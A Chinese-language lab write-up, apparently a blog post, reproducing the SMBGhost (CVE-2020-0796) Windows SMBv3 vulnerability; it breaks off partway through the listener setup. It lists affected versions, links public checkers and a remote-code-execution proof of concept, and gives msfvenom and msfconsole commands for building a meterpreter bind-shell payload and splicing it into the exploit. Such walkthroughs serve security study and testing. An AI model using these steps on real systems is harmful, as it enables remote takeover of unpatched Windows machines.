《永恒之黑》CVE-2020-0796漏洞複現
-
|漏洞簡介
2020年3月12日,微軟正式釋出CVE-2020-0796高危漏洞更新檔,本漏洞源于SMBv3沒有正确處理壓縮的資料包,在解壓資料包的時候使用用戶端傳過來的長度進行解壓時,并沒有檢查長度是否合法,最終導緻整數溢出。利用該漏洞,攻擊方可直接遠端攻擊SMB服務端遠端執行任意惡意代碼,CVE-2020-0796漏洞與“永恒之藍”系列漏洞極為相似,都是利用Windows SMB漏洞遠端攻擊擷取系統最高權限。
-
|影響版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
-
|漏洞複現
1.環境搭建:
kali 攻擊機:192.168.87.128
win10靶機:192.168.87.143
2.檢視win10靶機版本,win+r,輸入winver
3.使用SMBGhost工具檢測win靶機是否存在漏洞,工具下載下傳:https://github.com/ollypwn/SMBGhost《永恒之黑》CVE-2020-0796漏洞複現 《永恒之黑》CVE-2020-0796漏洞複現 也可以使用藍屏payload,驗證漏洞。藍屏poc下載下傳:https://github.com/chompie1337/SMBGhost_RCE_PoC《永恒之黑》CVE-2020-0796漏洞複現 win10出現藍屏,說明存在漏洞《永恒之黑》CVE-2020-0796漏洞複現 《永恒之黑》CVE-2020-0796漏洞複現 當然也有其他很多方法,如:
https://github.com/joaozietolie/CVE-2020-0796-Checker
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
4.利用msfvenom生成的exp反彈shell
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit
msf生成的exploit《永恒之黑》CVE-2020-0796漏洞複現 替換SMBGhost_RCE_PoC中的exploit.py,并把buf改為USER_PAYLOAD《永恒之黑》CVE-2020-0796漏洞複現 《永恒之黑》CVE-2020-0796漏洞複現 5.替換好了,設定msf監聽
msfconsole //運作msf
use exploit/multi/handler //開啟監聽子產品
set payload windows/x64/meterpreter/bind_tcp //設定反彈模式
set rhost 192.168.87.143 //設定目标靶機ip
《永恒之黑》CVE-2020-0796漏洞複現